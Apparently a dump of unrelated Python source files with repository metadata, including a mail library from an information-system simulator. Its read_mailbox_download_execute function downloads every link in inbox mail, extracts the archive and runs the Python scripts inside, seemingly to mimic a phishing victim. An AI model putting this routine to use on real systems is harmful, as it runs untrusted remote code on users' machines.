to_bin(write_data, 16),
to_bin(read_data, 16),
reg_w_name,
reg_r_name))
class Registers(object):
def __init__(self):
self.regs = [0] * 8
self.sp = 0
self.pc = 0
def write(self, reg, value):
if reg == "af":
self.regs[registers["a"]] = (value >> 8) & 0xff
self.regs[registers["f"]] = (value >> 0) & 0xff
elif reg == "bc":
self.regs[registers["b"]] = (value >> 8) & 0xff
self.regs[registers["c"]] = (value >> 0) & 0xff
elif reg == "de":
self.regs[registers["d"]] = (value >> 8) & 0xff
self.regs[registers["e"]] = (value >> 0) & 0xff
elif reg == "hl":
self.regs[registers["h"]] = (value >> 8) & 0xff
self.regs[registers["l"]] = (value >> 0) & 0xff
elif reg == "sp":
self.sp = value
elif reg == "pc":
self.pc = value
else:
self.regs[registers[reg]] = (value) & 0xff
def read(self, reg):
if reg == "af":
return self.regs[registers["a"]] << 8 | self.regs[registers["f"]];
elif reg == "bc":
return self.regs[registers["b"]] << 8 | self.regs[registers["c"]];
elif reg == "de":
return self.regs[registers["d"]] << 8 | self.regs[registers["e"]];
elif reg == "hl":
return self.regs[registers["h"]] << 8 | self.regs[registers["l"]];
elif reg == "sp":
return self.sp
elif reg == "pc":
return self.pc
else:
return self.regs[registers[reg]];
def random_op(self):
we = randint(0, 1)
reg_write = choice(registers.keys())
reg_read = choice(registers.keys())
write_data = randint(0, 0xffff)
read_data = self.read(reg_read)
if we:
self.write(reg_write, write_data)
return (registers[reg_write], registers[reg_read],
we, write_data, read_data, reg_write, reg_read)
def main():
fp = open("registers.txt", "w")
reg = Registers()
m = 1000000
for i in xrange(m):
if i % 10000 == 0:
f = 100 * float(i) / float(m)
print("%s" % f)
output_line(fp, *reg.random_op())
if __name__ == "__main__":
main()
| 31.121212 | 79 | 0.477118 | 404 | 3,081 | 3.517327 | 0.220297 | 0.106967 | 0.215341 | 0.080929 | 0.190007 | 0.142153 | 0.040816 | 0.040816 | 0 | 0 | 0 | 0.061455 | 0.339825 | 3,081 | 98 | 80 | 31.438776 | 0.637168 | 0.007465 | 0 | 0.159091 | 0 | 0 | 0.053974 | 0 | 0 | 0 | 0.013739 | 0 | 0 | 1 | 0.068182 | false | 0 | 0.022727 | 0 | 0.193182 | 0.011364 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1efa2e6d895702b8d443cbba288ae926b3327dee | 290 | py | Python | DiscordRPC/__init__.py | EterNomm/discord-rpc | 86bdf35a75df9ab8971763042d19f2f820e08a51 | [
"Apache-2.0"
] | 4 | 2021-12-13T13:26:00.000Z | 2022-02-20T17:11:19.000Z | DiscordRPC/__init__.py | LyQuid12/discord-rpc | 86bdf35a75df9ab8971763042d19f2f820e08a51 | [
"Apache-2.0"
] | null | null | null | DiscordRPC/__init__.py | LyQuid12/discord-rpc | 86bdf35a75df9ab8971763042d19f2f820e08a51 | [
"Apache-2.0"
] | null | null | null | from .presence import *
from .button import button
from .exceptions import *
#from .get_current_app import GCAR (Disabling due to a bug)
__title__ = "Discord-RPC"
__version__ = "3.5"
__authors__ = "LyQuid"
__license__ = "Apache License 2.0"
__copyright__ = "Copyright 2021-present LyQuid"
| 26.363636 | 59 | 0.762069 | 39 | 290 | 5.102564 | 0.74359 | 0.100503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032129 | 0.141379 | 290 | 10 | 60 | 29 | 0.767068 | 0.2 | 0 | 0 | 0 | 0 | 0.290043 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
1efbf1d335ee13e467149f16bec6b633d71434fe | 1,314 | py | Python | src/graph/cli/server.py | clayman-micro/graph | 742015c276f89841310794e952280a06c24fe8ef | [
"MIT"
] | null | null | null | src/graph/cli/server.py | clayman-micro/graph | 742015c276f89841310794e952280a06c24fe8ef | [
"MIT"
] | null | null | null | src/graph/cli/server.py | clayman-micro/graph | 742015c276f89841310794e952280a06c24fe8ef | [
"MIT"
] | null | null | null | import socket
import click
import uvicorn # type: ignore
def get_address(default: str = "127.0.0.1") -> str:
try:
ip_address = socket.gethostbyname(socket.gethostname())
except socket.gaierror:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(("8.8.8.8", 1))
ip_address = s.getsockname()[0]
except socket.gaierror:
ip_address = default
finally:
s.close()
return ip_address
@click.group()
@click.pass_context
def server(ctx):
pass
@server.command()
@click.option("--host", default=None, help="Specify application host")
@click.option("--port", default=5000, help="Specify application port")
@click.pass_context
def run(ctx, host, port):
try:
port = int(port)
if port < 1024 and port > 65535:
raise RuntimeError("Port should be from 1024 to 65535")
except ValueError:
raise RuntimeError("Port should be numeric")
if not host:
host = "127.0.0.1"
address = "127.0.0.1"
else:
address = get_address()
uvicorn.run(
"graph:init",
host=address,
port=port,
access_log=False,
log_level="info",
log_config=None,
loop="uvloop",
factory=True,
)
| 22.655172 | 70 | 0.590563 | 164 | 1,314 | 4.652439 | 0.445122 | 0.047182 | 0.019659 | 0.023591 | 0.076016 | 0 | 0 | 0 | 0 | 0 | 0 | 0.049041 | 0.286149 | 1,314 | 57 | 71 | 23.052632 | 0.764392 | 0.009132 | 0 | 0.152174 | 0 | 0 | 0.13 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065217 | false | 0.065217 | 0.065217 | 0 | 0.152174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
1efed2c2a7cb93434e5d67d1db9954f3a5ff1653 | 1,543 | py | Python | kubespawner/clients.py | moskiGithub/spawner_test | 405f088041054080f53b620b68fe040e5e0b091a | [
"BSD-3-Clause"
] | null | null | null | kubespawner/clients.py | moskiGithub/spawner_test | 405f088041054080f53b620b68fe040e5e0b091a | [
"BSD-3-Clause"
] | null | null | null | kubespawner/clients.py | moskiGithub/spawner_test | 405f088041054080f53b620b68fe040e5e0b091a | [
"BSD-3-Clause"
] | null | null | null | """Shared clients for kubernetes
avoids creating multiple kubernetes client objects,
each of which spawns an unused max-size thread pool
"""
from unittest.mock import Mock
import weakref
import kubernetes.client
from kubernetes.client import api_client
# FIXME: remove when instantiating a kubernetes client
# doesn't create N-CPUs threads unconditionally.
# monkeypatch threadpool in kubernetes api_client
# to avoid instantiating ThreadPools.
# This is known to work for kubernetes-4.0
# and may need updating with later kubernetes clients
_dummy_pool = Mock()
api_client.ThreadPool = lambda *args, **kwargs: _dummy_pool
_client_cache = {}
def shared_client(ClientType, *args, **kwargs):
"""Return a single shared kubernetes client instance
A weak reference to the instance is cached,
so that concurrent calls to shared_client
will all return the same instance until
all references to the client are cleared.
"""
kwarg_key = tuple((key, kwargs[key]) for key in sorted(kwargs))
cache_key = (ClientType, args, kwarg_key)
client = None
if cache_key in _client_cache:
# resolve cached weakref
# client can still be None after this!
client = _client_cache[cache_key]()
if client is None:
Client = getattr(kubernetes.client, ClientType)
client = Client(*args, **kwargs)
# cache weakref so that clients can be garbage collected
_client_cache[cache_key] = weakref.ref(client)
return client
| 32.829787 | 68 | 0.711601 | 203 | 1,543 | 5.295567 | 0.46798 | 0.089302 | 0.029767 | 0.035349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001672 | 0.224887 | 1,543 | 46 | 69 | 33.543478 | 0.897157 | 0.483474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021739 | 0 | 1 | 0.055556 | false | 0 | 0.222222 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
480a52a59f5e6ca79a9056130cb2d9abb336a9ed | 11,497 | py | Python | sim_user/mailLib.py | silicom-hub/IS_simulator | 4d134a8051c3604a94c2552503ff24015a3e86ee | [
"MIT"
] | 4 | 2021-11-24T10:58:51.000Z | 2022-03-11T15:13:22.000Z | sim_user/mailLib.py | silicom-hub/IS_simulator | 4d134a8051c3604a94c2552503ff24015a3e86ee | [
"MIT"
] | 1 | 2021-11-24T09:16:08.000Z | 2021-11-30T16:19:41.000Z | sim_user/mailLib.py | silicom-hub/IS_simulator | 4d134a8051c3604a94c2552503ff24015a3e86ee | [
"MIT"
] | 1 | 2021-11-24T11:10:38.000Z | 2021-11-24T11:10:38.000Z | import os
import wget
import time
import glob
import getpass
import tarfile
import subprocess
import email.mime.multipart
import email.mime.text
import email.mime.image
import email.mime.audio
from datetime import datetime
from pprint import pprint
from colorama import Style, Fore
from smtplib import SMTP, SMTP_SSL
from imaplib import IMAP4_SSL, IMAP4
def smtp_connect(smtp_server, verbose=True):
""" Conection to smtp server.
smtp_server_ip (str): This value is the smtp server's ip.
verbose (boolean): Print information about function progress.
Returns:
None
"""
try:
smtp = SMTP_SSL(host=smtp_server)
smtp.ehlo()
if verbose:
print(Fore.GREEN+ " ==> [smtp_connect] with SSL" +Style.RESET_ALL)
return smtp
except:
try:
smtp = SMTP(host=smtp_server)
smtp.ehlo()
if verbose:
print(Fore.GREEN+ " ==> [smtp_connect] without SSL" +Style.RESET_ALL)
return smtp
except:
print(Fore.RED+ " ==> [smtp_connect] failed!" +Style.RESET_ALL)
return 1
def imap_connect(imap_server, username, password, verbose=True):
""" Connection to imp server.
imap_server_ip (str): This value is the imap server's ip.
verbose (boolean): Print information about function progress.
Returns:
None
"""
try:
imap = IMAP4_SSL(imap_server)
imap.login(username, password)
if verbose:
print(Fore.GREEN+ " ==> [imap_connect] with SSL" +Style.RESET_ALL)
return imap
except:
try:
imap = IMAP4(imap_server)
imap.login(username, password)
if verbose:
print(Fore.GREEN+ " ==> [imap_connect] without SSL" +Style.RESET_ALL)
return imap
except:
print(Fore.RED+ " ==> [imap_connect] failed!" +Style.RESET_ALL)
def send_mail(smtp_server, FROM="", TO="", subject="", msg="", attachements=[], verbose=True):
""" Send mail.
smtp_server_ip (str): This value is the smtp server's ip.
FROM (str): This value is the sender email address.
TO (list): This value is a list of multiple recipient
SUBJECT (str, Optional): This value is the email's subject content.
msg (str, Optional): This value is the email's message content.
attachements (list Optional):
verbose (boolean): Print information about function progress.
Returns:
None
"""
smtp = smtp_connect(smtp_server, verbose=False)
mail = email.mime.multipart.MIMEMultipart()
mail["Subject"] = "[ "+subject+" ]"
mail["From"] = FROM
mail["To"] = TO
msg = email.mime.text.MIMEText(msg, _subtype="plain")
msg.add_header("Content-Disposition", "email message")
mail.attach(msg)
for attachement in attachements:
if attachement[0] == "image":
img = email.mime.image.MIMEImage(open(attachement[1], "rb").read())
img.add_header("Content-Disposition", "attachement")
img.add_header("Attachement-type", "image")
img.add_header("Attachement-filename", attachement[1])
mail.attach(img)
if attachement[0] == "file":
text = email.mime.text.MIMEText(open(attachement[1], "r").read())
text.add_header("Content-Disposition", "attachement")
text.add_header("Attachement-type", "filetext")
text.add_header("Attachement-filename", attachement[1])
mail.attach(text)
try:
smtp.sendmail(mail["From"], mail["To"], mail.as_string())
if verbose:
print(Fore.GREEN+ " ==> [send_mail] "+mail["From"]+" --> "+mail["To"]+" {"+subject+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
smtp_logout(smtp, verbose=False)
except Exception as e:
print(Fore.RED+ " ==> [send_mail] failed! "+mail["From"]+" --> "+mail["To"]+" -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
print(Fore.RED+str(e)+Style.RESET_ALL)
smtp_logout(smtp, verbose=False)
def read_mailbox(imap_server, username, password, verbose=True): # attribut [ _payload ]
""" Read email inbox
imap_server_ip (str): This value is the imap server's ip.
login (str): This value is the username login.
password (str): This value is the password login.
verbose (boolean): Print information about function progress.
Returns:
list of str: all emails content
"""
imap = imap_connect(imap_server, username, password, verbose=False)
all_mails = []
imap.select("INBOX")
status, mails = imap.search(None, "ALL")
for mail in mails[0].split():
status, data = imap.fetch(mail, "(RFC822)")
mail_content = email.message_from_string(data[0][1].decode("utf-8"))
all_mails.append(mail_content)
for part in mail_content.walk():
if not part.is_multipart():
pass
if verbose:
print(Fore.GREEN+ " ==> [read_mailbox] {"+str(len(mails)-1)+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
imap_logout(imap, verbose=False)
return all_mails
def read_mailbox_download_execute(imap_server, imap_login, imap_password):
""" Read email inbox and download link inside.
imap_server_ip (str): This value is the imap server's ip.
imap_login (str): This value is the username login.
imap_password (str): This value is the password login.
verbose (boolean): Print information about function progress.
Returns:
list of str: all emails content
"""
try:
path = None
mails = read_mailbox(imap_server, imap_login, imap_password, verbose=False)
if len(mails) <= 0:
print(Fore.YELLOW+ " ==> [read_mailbox_download_execute] {"+str(len(mails)-1)+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
return 0
for mail in mails:
for element in str(mail).replace("\n", " ").split(" "):
if "http" in element:
path = wget.download(element)
if path == None:
print(Fore.YELLOW+ " ==> [read_mailbox_download_execute] {"+str(len(mails)-1)+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
return 0
tarf_file = tarfile.open(path)
tarf_file.extractall(".")
tarf_file.close()
python_files = glob.glob("*/*maj*.py")
for python_script in python_files:
subprocess.getoutput("python3 "+python_script)
print(Fore.GREEN+ " ==> [read_mailbox_download_execute] {"+str(len(mails)-1)+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
return True
except Exception as e:
print(Fore.RED+ " ==> [read_mailbox_download_execute] failed during execution! -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
print(e)
return False
def download_attachements(imap_server, username, password, verbose=True):
""" Read email inbox and download attachements.
imap_server_ip (str): This value is the imap server's ip.
imap_login (str): This value is the username login.
imap_password (str): This value is the password login.
verbose (boolean): Print information about function progress.
Returns:
list of str: all emails content
"""
imap = imap_connect(imap_server, username, password, verbose=False)
#INIT
if not os.path.isdir("/home/"+getpass.getuser()+"/Downloads"):
os.makedirs("/home/"+getpass.getuser()+"/Downloads")
mails = []
imap.select("INBOX")
status, mails = imap.search(None, "ALL")
for mail in mails[0].split():
status, data = imap.fetch(mail, "(RFC822)")
mail_content = email.message_from_string(data[0][1].decode("utf-8"))
for part in mail_content.walk():
if not part.is_multipart():
if part["Content-Disposition"] == "attachement" and part["Attachement-type"] == "filetext":
username = getpass.getuser()
file = open(part["Attachement-filename"],"w")
file.write(part._payload)
file.close()
imap_logout(imap, verbose=False)
print(Fore.GREEN+ " ==> [download_attachements] --- " + time.strftime("%H:%M:%S", time.localtime())+Style.RESET_ALL)
# In progress
def delete_old_emails(imap, time_laps=60):
delete_messages = []
imap.select("INBOX")
status, mails = imap.search(None, "ALL")
for mail in mails[0].split():
status, data = imap.fetch(mail, "(RFC822)")
mail_content = email.message_from_string(data[0][1].decode("utf-8"))
if (time.time() - time.mktime(time.strptime(mail_content["Date"], "%a, %d %b %Y %H:%M:%S %z")) >= time_laps ):
delete_messages.append(mail)
delete_emails(imap, delete_messages)
def delete_emails(imap, mails):
""" Delete mails specified in attributs
imap (imap_object): This value is the imap server's object.
mails (list): This value is an email list to delete.
Returns:
list of str: all emails content
"""
for mail in mails:
imap.store(mail,"+FLAGS","\\Deleted")
imap.expunge()
def delete_all_emails(imap_server, username, password, verbose=True):
""" Delete all emails in INBOX.
imap_server_ip (str): This value is the imap server's ip.
imap_login (str): This value is the username login.
imap_password (str): This value is the password login.
verbose (boolean): Print information about function progress.
Returns:
list of str: all emails content
"""
imap = imap_connect(imap_server, username, password, verbose=False)
delete_messages = []
imap.select("INBOX")
status, mails = imap.search(None, "ALL")
for mail in mails[0].split():
delete_messages.append(mail)
delete_emails(imap, delete_messages)
status, mails = imap.search(None, "ALL")
if len(mails) == 1:
print(Fore.GREEN+ " ==> [delete_all_emails] was successfull --- " + time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
imap_logout(imap, verbose=False)
return 0
print(Fore.RED+ " ==> [delete_all_emails] failed! --- " + time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
imap_logout(imap, verbose=False)
return 1
def imap_logout(imap, verbose=True):
""" Logout out to the imap service
imap (imap_object): This value is the imap server's object.
Returns:
None
"""
try:
imap.close()
imap.logout()
if verbose:
print(Fore.GREEN+ " ==> [imap_logout] was successfull" +Style.RESET_ALL)
except:
print(Fore.RED+ " ==> [imap_logout] failed" +Style.RESET_ALL)
def smtp_logout(smtp, verbose=True):
""" Logout out to the smtp service
smtp (smtp_object): This value is the smtp server's object.
Returns:
None
"""
try:
smtp.quit()
if verbose:
print(Fore.GREEN+ " ==> [smtp_logout] was successfull" +Style.RESET_ALL)
except:
print(Fore.RED+ " ==> [smtp_logout] failed" +Style.RESET_ALL)
| 41.060714 | 168 | 0.609898 | 1,431 | 11,497 | 4.781272 | 0.134871 | 0.030254 | 0.036977 | 0.04297 | 0.655949 | 0.590178 | 0.540047 | 0.494592 | 0.456299 | 0.431453 | 0 | 0.005383 | 0.256676 | 11,497 | 279 | 169 | 41.207885 | 0.795226 | 0.231278 | 0 | 0.424731 | 0 | 0 | 0.151743 | 0.017252 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05914 | false | 0.086022 | 0.086022 | 0 | 0.209677 | 0.123656 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
48137f6833204958dbcfd12efea83db5d3727b1f | 158 | py | Python | python/square root.py | SULING4EVER/learngit | d55f942fbd782b309b0490c34a1bb743f6c4ef03 | [
"Apache-2.0"
] | null | null | null | python/square root.py | SULING4EVER/learngit | d55f942fbd782b309b0490c34a1bb743f6c4ef03 | [
"Apache-2.0"
] | null | null | null | python/square root.py | SULING4EVER/learngit | d55f942fbd782b309b0490c34a1bb743f6c4ef03 | [
"Apache-2.0"
] | null | null | null | x=input("Enter a umber of which you want to know the square root.")
x=int(x)
g=x/2
while (g*g-x)*(g*g-x)>0.00000000001:
g=(g+x/g)/2
print(g)
print(g)
| 19.75 | 67 | 0.620253 | 38 | 158 | 2.578947 | 0.552632 | 0.081633 | 0.091837 | 0.081633 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10687 | 0.170886 | 158 | 7 | 68 | 22.571429 | 0.641221 | 0 | 0 | 0.285714 | 0 | 0 | 0.35443 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
482697dcf4d097846528ae15ee8dbca33b6e86d7 | 525 | py | Python | splunge.py | neilebliss/reddit_bot | 74be4b57ddbdf9fe0d9876207388ee2778b4a50d | [
"Unlicense"
] | null | null | null | splunge.py | neilebliss/reddit_bot | 74be4b57ddbdf9fe0d9876207388ee2778b4a50d | [
"Unlicense"
] | null | null | null | splunge.py | neilebliss/reddit_bot | 74be4b57ddbdf9fe0d9876207388ee2778b4a50d | [
"Unlicense"
] | null | null | null | import praw
import re
import os
reddit = praw.Reddit('Splunge Bot v1', client_id=os.environ['REDDIT_CLIENT_ID'], client_secret=os.environ['REDDIT_CLIENT_SECRET'], password=os.environ['REDDIT_PASSWORD'], username=os.environ['REDDIT_USERNAME'])
subreddit = reddit.subreddit('tubasaur')
for submission in subreddit.new(limit=5):
for top_level_comment in submission.comments:
if re.search('splunge', top_level_comment.body, re.IGNORECASE):
top_level_comment.reply("Well, yeah, splunge for me too!")
print("Splunged.")
| 40.384615 | 210 | 0.775238 | 76 | 525 | 5.171053 | 0.486842 | 0.091603 | 0.152672 | 0.10687 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004193 | 0.091429 | 525 | 12 | 211 | 43.75 | 0.819707 | 0 | 0 | 0 | 0 | 0 | 0.257634 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.1 | 0.3 | 0 | 0.3 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4834a12f8b0a1adc974a9695986c5da1d9c04010 | 603 | py | Python | repost/api/schemas/user.py | pckv/fastapi-backend | 0f561528086ac3fdcabbf9efeac888421eeb66de | [
"MIT"
] | 9 | 2020-02-03T11:17:06.000Z | 2021-06-15T13:20:34.000Z | repost/api/schemas/user.py | pckv/fastapi-backend | 0f561528086ac3fdcabbf9efeac888421eeb66de | [
"MIT"
] | 40 | 2020-02-03T11:23:59.000Z | 2020-05-19T08:05:41.000Z | repost/api/schemas/user.py | pckv/fastapi-backend | 0f561528086ac3fdcabbf9efeac888421eeb66de | [
"MIT"
] | 1 | 2020-03-11T02:47:40.000Z | 2020-03-11T02:47:40.000Z | """API schemas for users."""
from datetime import datetime
from typing import Optional
from pydantic import BaseModel
class User(BaseModel):
"""Schema for a user account"""
username: str
bio: Optional[str]
avatar_url: Optional[str]
created: datetime
edited: Optional[datetime]
class Config:
orm_mode = True
class CreateUser(BaseModel):
"""Schema for creating a new user account"""
username: str
password: str
class EditUser(BaseModel):
"""Schema for editing a user account"""
bio: Optional[str] = None
avatar_url: Optional[str] = None
| 20.1 | 48 | 0.681592 | 75 | 603 | 5.44 | 0.453333 | 0.107843 | 0.132353 | 0.107843 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.223881 | 603 | 29 | 49 | 20.793103 | 0.871795 | 0.200663 | 0 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.058824 | 0.176471 | 0 | 0.941176 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
483592e4049e6951c186723536311a58d0a2c2a3 | 1,459 | py | Python | gluon/packages/dal/pydal/adapters/sap.py | GeorgesBrantley/ResistanceGame | 65ec925ec8399af355e176c4814a749fde5f907d | [
"BSD-3-Clause"
] | 408 | 2015-01-01T10:31:47.000Z | 2022-03-26T17:41:21.000Z | gluon/packages/dal/pydal/adapters/sap.py | GeorgesBrantley/ResistanceGame | 65ec925ec8399af355e176c4814a749fde5f907d | [
"BSD-3-Clause"
] | 521 | 2015-01-08T14:45:54.000Z | 2022-03-24T11:15:22.000Z | gluon/packages/dal/pydal/adapters/sap.py | GeorgesBrantley/ResistanceGame | 65ec925ec8399af355e176c4814a749fde5f907d | [
"BSD-3-Clause"
] | 158 | 2015-01-25T20:02:00.000Z | 2022-03-01T06:29:12.000Z | import re
from .._compat import integer_types, long
from .base import SQLAdapter
from . import adapters
@adapters.register_for("sapdb")
class SAPDB(SQLAdapter):
dbengine = "sapdb"
drivers = ("sapdb",)
REGEX_URI = (
"^(?P<user>[^:@]+)(:(?P<password>[^@]*))?"
r"@(?P<host>[^:/]+|\[[^\]]+\])/(?P<db>[^?]+)$"
)
def _initialize_(self):
super(SAPDB, self)._initialize_()
ruri = self.uri.split("://", 1)[1]
m = re.match(self.REGEX_URI, ruri)
if not m:
raise SyntaxError("Invalid URI string in DAL")
user = self.credential_decoder(m.group("user"))
password = self.credential_decoder(m.group("password"))
if password is None:
password = ""
host = m.group("host")
db = m.group("db")
self.driver_args.update(user=user, password=password, database=db, host=host)
def connector(self):
self.driver.connect(**self.driver_args)
def lastrowid(self, table):
self.execute("select %s.NEXTVAL from dual" % table._sequence_name)
return long(self.cursor.fetchone()[0])
def create_sequence_and_triggers(self, query, table, **args):
self.execute("CREATE SEQUENCE %s;" % table._sequence_name)
self.execute(
"ALTER TABLE %s ALTER COLUMN %s SET DEFAULT NEXTVAL('%s');"
% (table._rname, table._id._rname, table._sequence_name)
)
self.execute(query)
| 32.422222 | 85 | 0.592186 | 175 | 1,459 | 4.794286 | 0.428571 | 0.028605 | 0.060787 | 0.052443 | 0.131108 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002712 | 0.241947 | 1,459 | 44 | 86 | 33.159091 | 0.755877 | 0 | 0 | 0 | 0 | 0 | 0.169294 | 0.056888 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108108 | false | 0.135135 | 0.108108 | 0 | 0.351351 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4843692979b67bbb7eade27d08ade8ca10f18066 | 2,012 | py | Python | magPi_05_mountains.py | oniMoNaku/thePit | f82d2dc70346e6188fca493a4b9373aa99ccfa32 | [
"Unlicense"
] | null | null | null | magPi_05_mountains.py | oniMoNaku/thePit | f82d2dc70346e6188fca493a4b9373aa99ccfa32 | [
"Unlicense"
] | null | null | null | magPi_05_mountains.py | oniMoNaku/thePit | f82d2dc70346e6188fca493a4b9373aa99ccfa32 | [
"Unlicense"
] | null | null | null | # today is 389f
# the python pit
# magPi - 05
# MOUNTAINS
import os, pygame; from pygame.locals import *
pygame.init(); clock = pygame.time.Clock()
os.environ['SDL_VIDEO_WINDOW_POS'] = 'center'
pygame.display.set_caption("Mountains")
screen=pygame.display.set_mode([600,382],0,32)
sky = pygame.Surface((600,255))
r=0; g=64; b=128
for l in range (0,255):
pygame.draw.rect(sky,(r,g,b),(0,l-1,600,l))
r=r+1;g=g+1;b=b+1
if r>=255: r=255
if g>=255: g=255
if b>=255: b=255
ground = pygame.Surface((600,128))
r=192; g=255; b=192
for l in range (0,128):
pygame.draw.rect(ground,(r,g,b),(0,l-2,600,l))
r=r-2;g=g-2;b=b-2
if r<=0: r=0
if g<=0: g=0
if b<=0: b=0
# Add in an extra surface for the mountains
mountain = pygame.Surface((600,128))
mountain.set_colorkey([0,0,0]) # Black is transparent
r=96; g=64; b=255
for l in range (0,128):
pygame.draw.rect(mountain,(r,g,b),(0,l-2,600,l))
r=r+2;g=g+2;b=b+2
if r>=255: r=255
if g>=255: g=255
if b>=255: b=255
# Draw some black (Transparent) polygons to create mountain peaks
# The screen is 600 wide so I've drawn 10 polygons at 60 pixels wide each
pygame.draw.polygon(mountain,[0,0,0],[(0,0),(60,0),(60,10),(0,40)])
pygame.draw.polygon(mountain,[0,0,0],[(60,0),(120,0),(120,30),(60,10)])
pygame.draw.polygon(mountain,[0,0,0],[(120,0),(180,0),(180,20),(120,30)])
pygame.draw.polygon(mountain,[0,0,0],[(180,0),(240,0),(240,50),(180,20)])
pygame.draw.polygon(mountain,[0,0,0],[(240,0),(300,0),(300,40),(240,50)])
pygame.draw.polygon(mountain,[0,0,0],[(300,0),(360,0),(360,10),(300,40)])
pygame.draw.polygon(mountain,[0,0,0],[(360,0),(420,0),(420,35),(360,10)])
pygame.draw.polygon(mountain,[0,0,0],[(420,0),(480,0),(480,45),(420,35)])
pygame.draw.polygon(mountain,[0,0,0],[(480,0),(540,0),(540,42),(480,45)])
pygame.draw.polygon(mountain,[0,0,0],[(540,0),(600,0),(600,15),(540,42)])
screen.blit(sky,(0,0))
screen.blit(ground,(0,255))
screen.blit(mountain,(0,128))
pygame.display.update()
